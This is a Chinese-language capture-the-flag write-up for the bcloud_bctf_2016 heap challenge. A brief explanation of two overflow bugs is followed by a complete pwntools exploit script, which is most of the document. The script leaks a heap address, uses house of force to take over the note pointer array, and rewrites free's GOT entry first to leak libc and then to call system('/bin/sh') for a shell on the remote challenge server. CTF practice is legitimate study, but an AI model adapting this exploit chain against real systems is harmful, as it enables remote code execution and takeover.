bcloud_bctf_2016

首先检查一下程序的保护机制

然后，我们用IDA分析一下，主逻辑里面没有什么问题

漏洞点在于最开始的地方，输入name的时候，由于malloc是在输入之后，因此，v2处s的0截断字符会被覆盖为堆指针，从而strcpy的时候把堆指针的值也复制进去，造成了堆地址泄露。

另一个漏洞在于这里，也是同样的问题，可以造成top chunk的size被修改为v3的值。

由于程序没有开启PIE。因此top chunk与程序段间的offset我们就能计算出来了。达到了house of force的条件，我们将top chunk移到堆指针数组处，然后分配一个堆，就能*控制堆指针数组，实现任意地址读写。

#coding:utf8
from pwn import *
from LibcSearcher import *

#house of  force
#sh = process('./bcloud_bctf_2016')
sh = remote('node3.buuoj.cn',25777)
elf = ELF('./bcloud_bctf_2016')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
free_got = elf.got['free']
heap_array_addr = 0x0804B120
sh.sendafter('Input your name:','a'*0x40)
sh.recvuntil('a'*0x40)
heap_addr = u32(sh.recv(4))
print 'heap_addr=',hex(heap_addr)
sh.sendafter('Org:','a'*0x40)
#修改top chunk的size
sh.sendlineafter('Host:',p32(0xFFFFFFFF))
top_chunk_addr = heap_addr + 0xD0
print 'top_chunk_addr=',hex(top_chunk_addr)

def add(size,content):
   sh.sendlineafter('option--->>','1')
   sh.sendlineafter('Input the length of the note content:',str(size))
   sh.sendafter('Input the content:',content)

def edit(index,content):
   sh.sendlineafter('option--->>','3')
   sh.sendlineafter('Input the id:',str(index))
   sh.sendafter('Input the new content:',content)

def delete(index):
   sh.sendlineafter('option--->>','4')
   sh.sendlineafter('Input the id:',str(index))
offset = heap_array_addr - top_chunk_addr - 0x10
add(offset,'') #0
#现在top chunk移到了heap_array_addr-0x8处，我们可以控制heap_array了
add(0x18,'\n') #1

#修改heap_array
edit(1,p32(0) + p32(free_got) + p32(puts_got) + p32(0x0804B130) + '/bin/sh\x00')
#修改free的got表为puts的plt表
edit(1,p32(puts_plt) + '\n')
#泄露puts的地址
delete(2)
sh.recv(1)
puts_addr = u32(sh.recv(4))
libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
print 'libc_base=',hex(libc_base)
print 'system_addr=',hex(system_addr)
#修改free的got表为system地址
edit(1,p32(system_addr) + '\n')
#getshell
delete(3)

sh.interactive()